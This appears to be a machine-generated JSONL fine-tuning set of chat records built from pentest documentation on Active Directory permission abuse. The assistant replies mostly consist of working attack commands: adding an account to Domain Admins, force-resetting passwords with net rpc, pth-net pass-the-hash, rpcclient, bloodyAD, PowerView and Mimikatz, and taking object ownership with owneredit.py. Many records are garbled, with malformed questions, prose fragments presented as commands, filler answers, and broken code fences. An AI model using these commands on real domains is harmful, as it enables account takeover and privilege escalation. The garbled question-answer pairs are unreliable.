"docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Adds the member 'Kinda KU. USY' into the group 'Domain Admins'"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'AddGroupMember' -LdapConnection $LdapConnection -Identity 'CN=Kinda KU. USY,CN=Users,DC=X' -GroupDN 'CN=Domain Admins,CN=Users,DC=X'\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Adds the member 'Kinda KU. USY' into the group 'Domain Admins'", "response": "Invoke-PassTheCert -Action 'AddGroupMember' -LdapConnection $LdapConnection -Identity 'CN=Kinda KU. USY,CN=Users,DC=X' -GroupDN 'CN=Domain Admins,CN=Users,DC=X'\n```\n\n:::", "metadata": {"corpus_index": 395, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Adds the member 'Kinda KU. USY' into the group 'Domain Admins'?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'AddGroupMember' -LdapConnection $LdapConnection -Identity 'CN=Kinda KU. USY,CN=Users,DC=X' -GroupDN 'CN=Domain Admins,CN=Users,DC=X'\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Adds the member 'Kinda KU. USY' into the group 'Domain Admins'?", "response": "Invoke-PassTheCert -Action 'AddGroupMember' -LdapConnection $LdapConnection -Identity 'CN=Kinda KU. USY,CN=Users,DC=X' -GroupDN 'CN=Domain Admins,CN=Users,DC=X'\n```\n\n:::", "metadata": {"corpus_index": 395, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/addmember.md", "page_title": "AddMember", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about ForceChangePassword?"}, {"role": "assistant", "content": "This abuse can be carried out when controlling an object that has a GenericAll, AllExtendedRights or User-Force-Change-Password over the target user.\n\n::: tabs\n\n=== UNIX-like\n\nIt can also be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about ForceChangePassword?", "response": "This abuse can be carried out when controlling an object that has a GenericAll, AllExtendedRights or User-Force-Change-Password over the target user.\n\n::: tabs\n\n=== UNIX-like\n\nIt can also be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.\n\n```bash", "metadata": {"corpus_index": 396, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do ForceChangePassword"}, {"role": "assistant", "content": "This abuse can be carried out when controlling an object that has a GenericAll, AllExtendedRights or User-Force-Change-Password over the target user.\n\n::: tabs\n\n=== UNIX-like\n\nIt can also be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do ForceChangePassword", "response": "This abuse can be carried out when controlling an object that has a GenericAll, AllExtendedRights or User-Force-Change-Password over the target user.\n\n::: tabs\n\n=== UNIX-like\n\nIt can also be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.\n\n```bash", "metadata": {"corpus_index": 396, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about With net and cleartext credentials (will be prompted)"}, {"role": "assistant", "content": "net rpc password \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\" -S \"$DC_HOST\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about With net and cleartext credentials (will be prompted)", "response": "net rpc password \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\" -S \"$DC_HOST\"", "metadata": {"corpus_index": 397, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out With net and cleartext credentials (will be prompted) during a pentest?"}, {"role": "assistant", "content": "net rpc password \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\" -S \"$DC_HOST\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out With net and cleartext credentials (will be prompted) during a pentest?", "response": "net rpc password \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\" -S \"$DC_HOST\"", "metadata": {"corpus_index": 397, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about With net and cleartext credentials"}, {"role": "assistant", "content": "net rpc password \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"$PASSWORD\" -S \"$DC_HOST\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about With net and cleartext credentials", "response": "net rpc password \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"$PASSWORD\" -S \"$DC_HOST\"", "metadata": {"corpus_index": 398, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for With net and cleartext credentials"}, {"role": "assistant", "content": "net rpc password \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"$PASSWORD\" -S \"$DC_HOST\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for With net and cleartext credentials", "response": "net rpc password \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"$PASSWORD\" -S \"$DC_HOST\"", "metadata": {"corpus_index": 398, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain With Pass-the-Hash"}, {"role": "assistant", "content": "pth-net rpc password \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"ffffffffffffffffffffffffffffffff\":\"$NT_HASH\" -S \"$DC_HOST\"\n``\n\nThe rpcclient can also be used on UNIX-like systems when the package samba-common-bin is missing.\n\n`bash\nrpcclient -U $DOMAIN/$ControlledUser $DomainController\nrpcclient $> setuserinfo2 $TargetUser 23 $NewPassword\n`\n\nAlternatively, it can be achieved using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set password \"$TargetUser\" \"$NewPassword\"\n`\n\n=== Windows\n\nThe attacker can change the password of the user. This can be achieved with Set-DomainUserPassword (PowerView module).\n\n`bash\n$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\nSet-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword\n`\n\nMimikatz's lsadump::setntlm can also be used for that purpose.\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain With Pass-the-Hash", "response": "pth-net rpc password \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"ffffffffffffffffffffffffffffffff\":\"$NT_HASH\" -S \"$DC_HOST\"\n``\n\nThe rpcclient can also be used on UNIX-like systems when the package samba-common-bin is missing.\n\n`bash\nrpcclient -U $DOMAIN/$ControlledUser $DomainController\nrpcclient $> setuserinfo2 $TargetUser 23 $NewPassword\n`\n\nAlternatively, it can be achieved using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set password \"$TargetUser\" \"$NewPassword\"\n`\n\n=== Windows\n\nThe attacker can change the password of the user. This can be achieved with Set-DomainUserPassword (PowerView module).\n\n`bash\n$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\nSet-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword\n`\n\nMimikatz's lsadump::setntlm can also be used for that purpose.\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 399, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform With Pass-the-Hash?"}, {"role": "assistant", "content": "pth-net rpc password \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"ffffffffffffffffffffffffffffffff\":\"$NT_HASH\" -S \"$DC_HOST\"\n``\n\nThe rpcclient can also be used on UNIX-like systems when the package samba-common-bin is missing.\n\n`bash\nrpcclient -U $DOMAIN/$ControlledUser $DomainController\nrpcclient $> setuserinfo2 $TargetUser 23 $NewPassword\n`\n\nAlternatively, it can be achieved using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set password \"$TargetUser\" \"$NewPassword\"\n`\n\n=== Windows\n\nThe attacker can change the password of the user. This can be achieved with Set-DomainUserPassword (PowerView module).\n\n`bash\n$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\nSet-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword\n`\n\nMimikatz's lsadump::setntlm can also be used for that purpose.\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform With Pass-the-Hash?", "response": "pth-net rpc password \"$TargetUser\" -U \"$DOMAIN\"/\"$USER\"%\"ffffffffffffffffffffffffffffffff\":\"$NT_HASH\" -S \"$DC_HOST\"\n``\n\nThe rpcclient can also be used on UNIX-like systems when the package samba-common-bin is missing.\n\n`bash\nrpcclient -U $DOMAIN/$ControlledUser $DomainController\nrpcclient $> setuserinfo2 $TargetUser 23 $NewPassword\n`\n\nAlternatively, it can be achieved using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set password \"$TargetUser\" \"$NewPassword\"\n`\n\n=== Windows\n\nThe attacker can change the password of the user. This can be achieved with Set-DomainUserPassword (PowerView module).\n\n`bash\n$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\nSet-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword\n`\n\nMimikatz's lsadump::setntlm can also be used for that purpose.\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 399, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the The syntax for with pass-the-hash?"}, {"role": "assistant", "content": "The [rpcclient](https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html) can also be used on UNIX-like systems when the package `samba-common-bin` is missing."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the The syntax for with pass-the-hash?", "response": "The [rpcclient](https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html) can also be used on UNIX-like systems when the package `samba-common-bin` is missing.", "metadata": {"corpus_index": 400, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out With Pass-the-Hash during a pentest?"}, {"role": "assistant", "content": "The [rpcclient](https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html) can also be used on UNIX-like systems when the package `samba-common-bin` is missing."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out With Pass-the-Hash during a pentest?", "response": "The [rpcclient](https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html) can also be used on UNIX-like systems when the package `samba-common-bin` is missing.", "metadata": {"corpus_index": 400, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The [rpcclient](https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html) can also be used on UNIX-like systems when the package `samba-common-bin` is missing.`?"}, {"role": "assistant", "content": "This command is used for with pass-the-hash. With Pass-the-Hash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The [rpcclient](https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html) can also be used on UNIX-like systems when the package `samba-common-bin` is missing.`?", "response": "This command is used for with pass-the-hash. With Pass-the-Hash", "metadata": {"corpus_index": 400, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through With Pass-the-Hash"}, {"role": "assistant", "content": "Alternatively, it can be achieved using [bloodyAD](https://github.com/CravateRouge/bloodyAD)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through With Pass-the-Hash", "response": "Alternatively, it can be achieved using [bloodyAD](https://github.com/CravateRouge/bloodyAD)", "metadata": {"corpus_index": 401, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Alternatively, it can be achieved using [bloodyAD](https://github.com/CravateRouge/bloodyAD)`?"}, {"role": "assistant", "content": "This command is used for with pass-the-hash. With Pass-the-Hash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Alternatively, it can be achieved using [bloodyAD](https://github.com/CravateRouge/bloodyAD)`?", "response": "This command is used for with pass-the-hash. With Pass-the-Hash", "metadata": {"corpus_index": 401, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through With Pass-the-Hash"}, {"role": "assistant", "content": "=== Windows\n\nThe attacker can change the password of the user. This can be achieved with [Set-DomainUserPassword](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainUserPassword/) ([PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) module)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through With Pass-the-Hash", "response": "=== Windows\n\nThe attacker can change the password of the user. This can be achieved with [Set-DomainUserPassword](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainUserPassword/) ([PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) module).", "metadata": {"corpus_index": 402, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for with pass-the-hash. With Pass-the-Hash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for with pass-the-hash. With Pass-the-Hash", "metadata": {"corpus_index": 402, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on With Pass-the-Hash"}, {"role": "assistant", "content": "Mimikatz's [`lsadump::setntlm`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/setntlm) can also be used for that purpose.\n\nAlso, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on With Pass-the-Hash", "response": "Mimikatz's [`lsadump::setntlm`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/setntlm) can also be used for that purpose.\n\nAlso, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash).", "metadata": {"corpus_index": 403, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Mimikatz's [`lsadump::setntlm`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/setntlm) can also be used for that purpose.`?"}, {"role": "assistant", "content": "This command is used for with pass-the-hash. With Pass-the-Hash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Mimikatz's [`lsadump::setntlm`](https://tools.thehacker.recipes/mimikatz/modules/lsadump/setntlm) can also be used for that purpose.`?", "response": "This command is used for with pass-the-hash. With Pass-the-Hash", "metadata": {"corpus_index": 403, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Updates the password of account 'Wordy WP. PRESS' to an empty string"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'UpdatePasswordOfIdentity' -LdapConnection $LdapConnection -Identity 'CN=Wordy WP. PRESS,CN=Users,DC=X' -NewPassword ''"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Updates the password of account 'Wordy WP. PRESS' to an empty string", "response": "Invoke-PassTheCert -Action 'UpdatePasswordOfIdentity' -LdapConnection $LdapConnection -Identity 'CN=Wordy WP. PRESS,CN=Users,DC=X' -NewPassword ''", "metadata": {"corpus_index": 404, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Updates the password of account 'Wordy WP. PRESS' to an empty string"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'UpdatePasswordOfIdentity' -LdapConnection $LdapConnection -Identity 'CN=Wordy WP. PRESS,CN=Users,DC=X' -NewPassword ''"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Updates the password of account 'Wordy WP. PRESS' to an empty string", "response": "Invoke-PassTheCert -Action 'UpdatePasswordOfIdentity' -LdapConnection $LdapConnection -Identity 'CN=Wordy WP. PRESS,CN=Users,DC=X' -NewPassword ''", "metadata": {"corpus_index": 404, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Updates the password of account 'Wordy WP. PRESS' to: NewP@ssw0rd123!?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'UpdatePasswordOfIdentity' -LdapConnection $LdapConnection -Identity 'CN=Wordy WP. PRESS,CN=Users,DC=X' -NewPassword 'NewP@ssw0rd123!'\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Updates the password of account 'Wordy WP. PRESS' to: NewP@ssw0rd123!?", "response": "Invoke-PassTheCert -Action 'UpdatePasswordOfIdentity' -LdapConnection $LdapConnection -Identity 'CN=Wordy WP. PRESS,CN=Users,DC=X' -NewPassword 'NewP@ssw0rd123!'\n```\n\n:::", "metadata": {"corpus_index": 405, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Updates the password of account 'Wordy WP. PRESS' to: NewP@ssw0rd123!?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'UpdatePasswordOfIdentity' -LdapConnection $LdapConnection -Identity 'CN=Wordy WP. PRESS,CN=Users,DC=X' -NewPassword 'NewP@ssw0rd123!'\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Updates the password of account 'Wordy WP. PRESS' to: NewP@ssw0rd123!?", "response": "Invoke-PassTheCert -Action 'UpdatePasswordOfIdentity' -LdapConnection $LdapConnection -Identity 'CN=Wordy WP. PRESS,CN=Users,DC=X' -NewPassword 'NewP@ssw0rd123!'\n```\n\n:::", "metadata": {"corpus_index": 405, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/forcechangepassword.md", "page_title": "ForceChangePassword", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Grant ownership"}, {"role": "assistant", "content": "t has the following command-line arguments.This abuse can be carried out when controlling an object that has WriteOwner or GenericAll over any object.\n\nThe attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. For instance, the attacker could change the target object's permissions and grant rights.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's owneredit.py (Python).\n\n``bash\nowneredit.py -action write -new-owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'\n`\n\nAlternatively, it can be achieved using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set owner $TargetObject $ControlledPrincipal\n`\n\n=== Windows\n\nFrom Windows systems, this can be achieved with Set-DomainObjectOwner (PowerView module).\n\n`bash\nSet-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'\n`\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an 